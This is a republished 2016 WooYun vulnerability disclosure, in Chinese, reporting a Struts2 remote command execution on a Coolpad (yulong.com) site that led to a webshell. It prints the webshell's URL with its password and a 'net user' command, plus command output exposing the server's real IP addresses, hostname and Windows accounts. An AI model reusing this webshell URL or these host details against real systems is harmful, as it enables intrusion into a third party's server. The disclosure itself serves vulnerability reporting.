神器而已之酷派某站命令执行导致Getshell

admin

140862
文章

117
评论

2017年4月28日07:09:15评论244 views字数 230阅读0分46秒阅读模式

摘要

2016-04-13：细节已通知厂商并且等待厂商处理中
2016-04-13：厂商已查看当前漏洞内容,细节仅向厂商公开
2016-04-18：厂商已经主动忽略漏洞，细节向公众公开

漏洞概要关注数(16) 关注此漏洞

缺陷编号： WooYun-2016-195983

漏洞标题：神器而已之酷派某站命令执行导致Getshell

漏洞作者：路人甲

提交时间： 2016-04-13 21:01

公开时间： 2016-04-18 21:10

漏洞类型：命令执行

危害等级：高

自评Rank： 18

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： struts 远程命令执行

1人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

mask 区域

1.http://**.**.**/ftp.login.htm_
 2.http://**.**.**/666.jsppwd=023&i=ipconfig

st2漏洞，该打补丁了...别打运维...

code 区域

Windows IP Configuration
 
 
 
 
 
 Ethernet adapter WAN:
 
 
 
    Connection-specific DNS Suffix  . : 
 
    IP Address. . . . . . . . . . . . : 121.15.143.232
 
    Subnet Mask . . . . . . . . . . . : 255.255.255.240
 
    Default Gateway . . . . . . . . . : 121.15.143.238
 
 
 
 Ethernet adapter LAN:
 
 
 
    Connection-specific DNS Suffix  . : 
 
    IP Address. . . . . . . . . . . . : 172.16.2.54
 
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
 
    Default Gateway . . . . . . . . . : 
 
 
 
 Tunnel adapter Teredo Tunneling Pseudo-Interface:
 
 
 
    Connection-specific DNS Suffix  . : 
 
    IP Address. . . . . . . . . . . . : fe80::ffff:ffff:fffd%4
 
    Default Gateway . . . . . . . . . : 
 
 
 
 Tunnel adapter 6to4 Tunneling Pseudo-Interface:
 
 
 
    Connection-specific DNS Suffix  . : 
 
    IP Address. . . . . . . . . . . . : 2002:790f:8fe8::790f:8fe8
 
    Default Gateway . . . . . . . . . : 2002:c058:6301::c058:6301
 
 
 
 Tunnel adapter Automatic Tunneling Pseudo-Interface:
 
 
 
    Connection-specific DNS Suffix  . : 
 
    IP Address. . . . . . . . . . . . : fe80::5efe:121.15.143.232%2
 
    Default Gateway . . . . . . . . . : 
 
 
 
 Tunnel adapter Automatic Tunneling Pseudo-Interface:
 
 
 
    Connection-specific DNS Suffix  . : 
 
    IP Address. . . . . . . . . . . . : fe80::5efe:172.16.2.54%2
 
    Default Gateway . . . . . . . . . :

code 区域

http://esmdownload1.yulong.com/666.jsp?pwd=023&i=net%20user
 
 外网，有点骚啊，夜深人静了，学习去了。不深入了。
 
 
 //FEIMIJIWAIFA ?????
 
 -------------------------------------------------------------------------------
 
 Administrator            ASPNET                   Guest                    
 
 IUSR_FEIMIJIWAIFA        IWAM_FEIMIJIWAIFA        SUPPORT_388945a0         
 ???????

漏洞证明：

详细说明

修复方案：

补丁或者下线吧

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2016-04-18 21:10

厂商回复：

漏洞Rank：15 (WooYun评价)

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-04-14 09:01 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

1

@举起手来

1# 回复此人
2016-04-14 09:26 | zsmj ( 普通白帽子 | Rank:243 漏洞数:34 | 蛛丝马迹！)

1

神器而已

2# 回复此人

漏洞概要 关注数(16) 关注此漏洞

缺陷编号： WooYun-2016-195983

漏洞标题： 神器而已之酷派某站命令执行导致Getshell

相关厂商： yulong.com

漏洞作者： 路人甲